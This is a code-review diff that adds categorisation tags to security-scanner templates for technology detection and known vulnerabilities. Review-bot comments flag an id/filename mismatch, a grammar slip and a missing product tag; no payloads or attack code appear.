--- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,10 +1,12 @@ -id: tomcat-version-detect +id: tomcat-version + info: name: Detect Tomcat Version author: philippedelteil - description: If an Tomcat instance is deployed on the target URL, when we send a request for - a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info + tags: tech,tomcat,apache + requests: - method: GET path: diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml index ddbe880309..4957f092b8 100644 --- a/technologies/tor-socks-proxy.yaml +++ b/technologies/tor-socks-proxy.yaml @@ -1,8 +1,10 @@ id: tor-socks-proxy + info: name: Detect tor SOCKS proxy author: geeknik severity: info + tags: tech,tor,proxy requests: - method: GET diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 6d290ac6f8..4effb62c55 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Weblogic author: bing0o severity: info + tags: tech,weblogic requests: - method: GET diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml index f11eac5435..aa90f4c1a3 100644 --- a/technologies/werkzeug-debugger-detect.yaml +++ b/technologies/werkzeug-debugger-detect.yaml @@ -4,6 +4,7 @@ info: name: Werkzeug debugger console author: pdteam severity: info + tags: tech,werkzeug requests: - method: GET diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3f04c30a27..56b6d5f00f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml 
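Review bot: The id is changed from `tomcat-version-detect` to `tomcat-version`, but the file is technologies/tomcat-detect.yaml, so the id/filename mismatch the change presumably meant to fix remains; either use `id: tomcat-detect` or rename the file to match. technologies/metabase-detect.yaml, also touched by this patch, has the same mismatch (`id: metabase-version-detect`). The rejoined description line also keeps the grammar slip: `description: If a Tomcat instance is deployed on the target URL, a request for a non-existent resource returns a Tomcat error page that includes the version.`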
@@ -8,6 +8,7 @@ info: reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + tags: rce,listserv,ognl requests: - method: GET diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index b8ebf42adb..04a5d1b654 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: medium reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti requests: - method: GET diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index f4fa330ad9..04795427db 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info reference: https://www.exploit-db.com/exploits/27888 + tags: exposure,resin requests: - method: GET diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 062d1759ab..a62783f871 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: high reference: https://www.exploit-db.com/exploits/49054 + tags: lfi,pmb requests: - method: GET diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index d0dcd358f6..6f612b4f78 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48877 - + tags: auth-bypass requests: - raw: - | 
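Review bot: The blank line is replaced by `tags: auth-bypass` with no product tag, while the sibling vulnerabilities/other/zms-auth-bypass.yaml in this patch gets `auth-bypass,zms`; use `tags: auth-bypass,vpms`. Because the blank line was consumed rather than kept, `requests:` now follows `info` with no separator, unlike every other template here; restore the blank line after the new tags line.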
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index fbc1e03821..65c7df9984 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms requests: - raw: